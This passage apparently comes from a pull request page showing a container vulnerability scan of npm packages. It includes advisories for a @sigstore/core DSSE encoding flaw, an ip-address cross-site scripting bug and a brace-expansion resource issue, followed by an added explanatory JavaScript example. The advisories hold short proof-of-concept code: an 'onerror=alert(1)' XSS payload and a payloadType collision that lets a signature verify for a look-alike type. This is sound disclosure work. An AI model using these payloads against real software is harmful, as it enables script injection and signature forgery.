Additionally, payloadType.length returns the JavaScript string length (UTF-16 code units) rather than the UTF-8 byte length required by the DSSE spec, though this is only a contributing factor for non-ASCII types.

Reproduction

const { preAuthEncoding } = require('@sigstore/core/dist/dsse.js');
const payload = Buffer.from('hello world');

const original = preAuthEncoding('text/plain', payload);
// U+01xx chars whose low bytes match the original ASCII chars
const mutant = preAuthEncoding('\u0174\u0165\u0178\u0174/\u0170\u016c\u0161\u0169\u016e', payload);

console.log('PAE bytes equal:', original.equals(mutant)); // true — should be false
critical: 0 high: 0 medium: 1 low: 0 ip-address 10.1.0 (npm)

pkg:npm/ip-address@10.1.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 5.3: CVE-2026-42338 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Affected range: <=10.1.0
Fixed version: 10.1.1
CVSS Score: 5.3
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.441%
EPSS Percentile: 35th percentile
Description

Summary

Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. A related issue in v6.helpers.spanAll() produced malformed markup but was not exploitable; it is hardened in the same release for consistency.

Details

Four related issues were identified and fixed together:

  1. Address6.group(): zone ID injection. The Address6 constructor stores the raw input (including any IPv6 zone ID) in this.address before zone stripping. group() then passed this.address to helpers.simpleGroup(), which wrapped each :-separated segment in a <span> element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim.
  2. Address6.link({ prefix, className }): attribute-value injection. link() concatenated user-supplied prefix and className into the href="…" and class="…" attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g. onmouseover) and achieve XSS.
  3. Address6 constructor: leading-zero IPv4 error path. The leading-zero branch in parse4in6() built AddressError.parseMessage by concatenating the raw address through String.replace(). Because parse4in6() runs before the bad-character check, any characters in the groups preceding the IPv4 suffix flowed into the error's HTML unescaped. Consumers who render parseMessage as HTML (its documented purpose — it already contains <span class="parse-error"> markup) could be XSS'd by a crafted input such as <img src=x onerror=alert(1)>:10.0.01.1.
  4. v6.helpers.spanAll(): attribute-value injection (defense in depth). spanAll() embedded each character of its input into a class="digit value-${n} …" attribute without escaping. Because split('') limits n to a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency.

Affected Versions

All versions up to and including 10.1.0.

Patched Version

10.1.1.

Impact

Real-world exposure is believed to be extremely limited. Analysis of all 425 dependent npm packages as well as GitHub code search found zero consumers of group(), link(), or spanAll(): these HTML-emitting surfaces appear to be unused across published npm packages and public repositories. Applications using only the address-parsing and comparison APIs (isValid, correctForm, isInSubnet, bigInt, etc.) are not affected.

Consumers who do render the output of group(), link(), spanAll(), or AddressError.parseMessage as HTML against untrusted input should upgrade.

PoC

const { Address6 } = require('ip-address');
const addr = new Address6('fe80::1%<img src=x onerror=alert(1)>');
document.body.innerHTML = addr.group();  // fires the onerror handler in 10.1.0

Workarounds

If users cannot upgrade immediately:

  • Do not pass untrusted input to the Address6 constructor, or
  • Never render the output of group(), link(), or spanAll(), nor the parseMessage field of any thrown AddressError, as HTML; treat these values as text only, or run them through DOMPurify before inserting into the DOM (DOMPurify's default configuration preserves the library's intended <span> wrapping while stripping any injected event handlers), or
  • Validate input with Address6.isValid() and reject anything that contains a zone identifier (a % character) or characters outside [0-9a-fA-F:/] before passing it to the constructor.

Lack of separate CVEs

Given the evidence that these methods are not used, and given that they are all of the same construction, maintainers do not think it's relevant or useful to create a separate CVE for each library method.

Credit

ip-address thanks @scovetta for reporting this issue.

critical: 0 high: 0 medium: 1 low: 0 brace-expansion 5.0.5 (npm)

pkg:npm/brace-expansion@5.0.5

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

medium 6.5: CVE-2026-45149 Uncontrolled Resource Consumption

Affected range: >=5.0.0, <5.0.6
Fixed version: 5.0.6
CVSS Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
EPSS Score: 0.278%
EPSS Percentile: 19th percentile
Description

The max option was being applied too late:

When expanding a single large numeric range like {1..10000000}, the sequence generation loop generates all 10 million intermediate elements before the max limit is applied. With max=10, the output is correctly limited to 10 items, but the process still allocates ~505 MB and spends ~800ms building the full intermediate array.

Workaround

Ensure the string to be expanded doesn't contain more values than the desired max item count.

critical: 0 high: 0 medium: 0 low: 0 unspecified: 11 node 24.16.0 (generic)

pkg:generic/node@24.16.0

# Dockerfile (28:28)
COPY --from=builder --chown=nonroot:nonroot --chmod=555 /home/nonroot/.local/ /home/nonroot/.local/

unspecified : BSA-2026-48937

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48935

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48934

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48933

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48931

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48930

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48928

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48619

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48618

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48617

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

unspecified : BSA-2026-48615

Affected range: >=24.0.0, <24.17.0
Fixed version: 24.17.0
Description

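The @sigstore/core finding above (CVE-2026-48758) turns on how the DSSE Pre-Authentication Encoding is turned into bytes. The following is an added example, not code from @sigstore/core or from this repository: it builds the PAE both the flawed way the advisory describes (UTF-16 length plus Node's 'ascii' encoding) and the corrected way (UTF-8 byte length plus UTF-8 encoding), and checks whether a low-byte look-alike payloadType collides with the real one. The function names, the sample payload and the lowByteLookalike helper are assumptions made for the example; the helper generalizes the advisory's hand-written mutant by shifting every character, '/' included, to the U+01xx code point with the same low byte.

```javascript
// Added example (not @sigstore/core's own code). DSSE PAE layout:
//   "DSSEv1 <len(type)> <type> <len(payload)> <payload>"

// Flawed construction, mirroring the defect described in the advisory:
// the length is the UTF-16 code-unit count and 'ascii' (equivalent to
// 'latin1' in Node when encoding) keeps only the low byte of each character.
function paeFlawed(payloadType, payload) {
  const prefix = `DSSEv1 ${payloadType.length} ${payloadType} ${payload.length} `;
  return Buffer.concat([Buffer.from(prefix, 'ascii'), payload]);
}

// Corrected construction: the length is the UTF-8 byte length and the prefix
// is encoded as UTF-8, so distinct payloadType strings give distinct PAE bytes.
function paeFixed(payloadType, payload) {
  const typeLen = Buffer.byteLength(payloadType, 'utf8');
  const prefix = `DSSEv1 ${typeLen} ${payloadType} ${payload.length} `;
  return Buffer.concat([Buffer.from(prefix, 'utf8'), payload]);
}

// Hypothetical helper: replaces every character with the U+01xx code point
// that shares its low byte (t U+0074 -> Ŵ U+0174), the substitution the
// advisory's table describes, applied to the whole string.
function lowByteLookalike(payloadType) {
  return Array.from(payloadType, (c) =>
    String.fromCharCode(0x100 + c.charCodeAt(0))
  ).join('');
}

// True when two payload types yield byte-identical PAE under the given
// encoder, i.e. when a signature computed over one would verify for the other.
function typesCollide(encoder, typeA, typeB, payload) {
  return encoder(typeA, payload).equals(encoder(typeB, payload));
}

// Constructed sample input.
const samplePayload = Buffer.from('hello world');
const realType = 'text/plain';
const lookalikeType = lowByteLookalike(realType);

console.log('flawed PAE collides:', typesCollide(paeFlawed, realType, lookalikeType, samplePayload));
console.log('fixed  PAE collides:', typesCollide(paeFixed, realType, lookalikeType, samplePayload));
console.log('fixed  PAE bytes   :', JSON.stringify(paeFixed(realType, samplePayload).toString('utf8')));
```

Under the flawed encoder the two types produce identical bytes, so a signature over the real type verifies for the look-alike; under the fixed encoder the length field alone (10 versus 20 bytes) already separates them, and the UTF-8 type bytes differ as well. A verifier that reconstructs the PAE with the fixed routine therefore rejects a mutated payloadType.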
@mergify mergify Bot temporarily deployed to docker_image July 1, 2026 21:10 Inactive
@mergify mergify Bot had a problem deploying to code_quality July 1, 2026 21:11 Failure
@mergify mergify Bot had a problem deploying to container_health July 1, 2026 21:11 Failure
@mergify mergify Bot temporarily deployed to docker_image July 1, 2026 21:12 Inactive